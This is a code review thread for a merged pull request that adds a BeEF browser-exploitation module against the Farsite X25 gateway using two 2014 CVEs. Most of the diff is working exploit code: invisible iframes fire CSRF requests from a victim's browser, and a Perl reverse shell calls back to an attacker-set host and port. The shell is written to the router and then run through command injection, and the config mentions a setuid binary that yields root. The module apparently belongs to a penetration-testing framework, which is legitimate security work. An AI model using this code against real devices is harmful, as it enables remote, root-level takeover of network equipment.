### PR TITLE
FarLinX X25 auth RCE module

### PR DESCRIPTION
**Pull request by wireghoul**
Exploits CVE-2014-7175 and CVE-2014-7173 to get remote code execution through CSRF as an authenticated user.

### CODE REVIEW

**Comment by bcoles** [comment]
Thanks @wireghoul I'll take a look at this soon

File: modules/exploits/farsite_x25_remote_shell/config.yaml [hunk 1]
```diff
@@ -0,0 +1,12 @@
+#
+beef:
+    module:
+        farsite_X25_remote_shell:
+            enable: true
+            category: "Exploits"
+            name: "Farsite X25 gateway remote code execution"
+            description: "This module exploits CVE-2014- to write a payload to the router and CVE-2014- to execute it. Once you have shell you can use the setuid /http/bin/execCmd to execute commands as root."
```
Comment (bcoles) [inline modules/exploits/farsite_x25_remote_shell/config.yaml]: `CVE-2014-7175` and `CVE-2014-7173`

File: modules/exploits/farsite_x25_remote_shell/command.js [hunk 2]
```diff
@@ -0,0 +1,39 @@
...
+  exploit = function() {
+    //Command injecting on the router
+    var x25e_<%= @command_id %> = beef.dom.createInvisibleIframe();
+    var uri = scheme + '://' + rhost + "/fsx25MonProxy.php?strSubmitData=start+|perl</http/htdocs/fsUI.xyz;echo";
+    x25e_<%= @command_id %>.setAttribute('src', uri);
+  };
+
+  try {
+    writefile();
+    setTimeout(exploit,3000);
```
Comment (bcoles) [inline modules/exploits/farsite_x25_remote_shell/command.js]: A slightly higher timeout like `5000` might be more appropriate if the user is on a slow connection.

Comment (wireghoul) [inline modules/exploits/farsite_x25_remote_shell/command.js]: Sounds fair

File: modules/exploits/farsite_x25_remote_shell/command.js [hunk 3]
```diff
@@ -0,0 +1,39 @@
...
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+
+
+  writefile = function() {
+    var revshell='use+IO;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}';
+    revshell = revshell + '$c=new IO::Socket::INET(PeerAddr,"' + lhost + ':' + lport +'");';
+    revshell = revshell + 'STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};';
+    //var x25_write_iframe_<%= @command_id %>= beef.dom.createInvisibleIframe();
```
Comment (wireghoul) [inline modules/exploits/farsite_x25_remote_shell/command.js]: Nope, it's needed although the commented out lines can go

File: modules/exploits/farsite_x25_remote_shell/command.js [hunk 4]
```diff
@@ -0,0 +1,39 @@
...
+    var x25w_<%= @command_id %>= beef.dom.createInvisibleIframe();
+    var uri = scheme + '://' + rhost + "/fsSaveUIPersistence.php?strSubmitData=" + revshell;
+    //About to hit uri
+    x25w_<%= @command_id %>.setAttribute('src', uri);
+  };
+
+  validate = function() {
```
Comment (wireghoul) [inline modules/exploits/farsite_x25_remote_shell/command.js]: Yes, the x25w frame hits the save persistence url which writes the reverse shell to a local file, the x25e frame then executes that file using a cmd injection. Cmd injection without is possible but bad chars means this method works well for this lazy exploit writer

Comment (bcoles) [inline modules/exploits/farsite_x25_remote_shell/command.js]: Comment was in reference to line 22 and 23

File: modules/exploits/farsite_x25_remote_shell/command.js (hunk 3 above)
Comment (wireghoul) [inline modules/exploits/farsite_x25_remote_shell/command.js]: That can go

File: modules/exploits/farsite_x25_remote_shell/command.js (hunk 4 above)
Comment (wireghoul) [inline modules/exploits/farsite_x25_remote_shell/command.js]: As long as it won't cause BeEF to break... I have no need for it, but didn't feel like having the module fail on a missing function call

**Comment by bcoles** [comment]
Thanks. Merged.

**Pull request merged**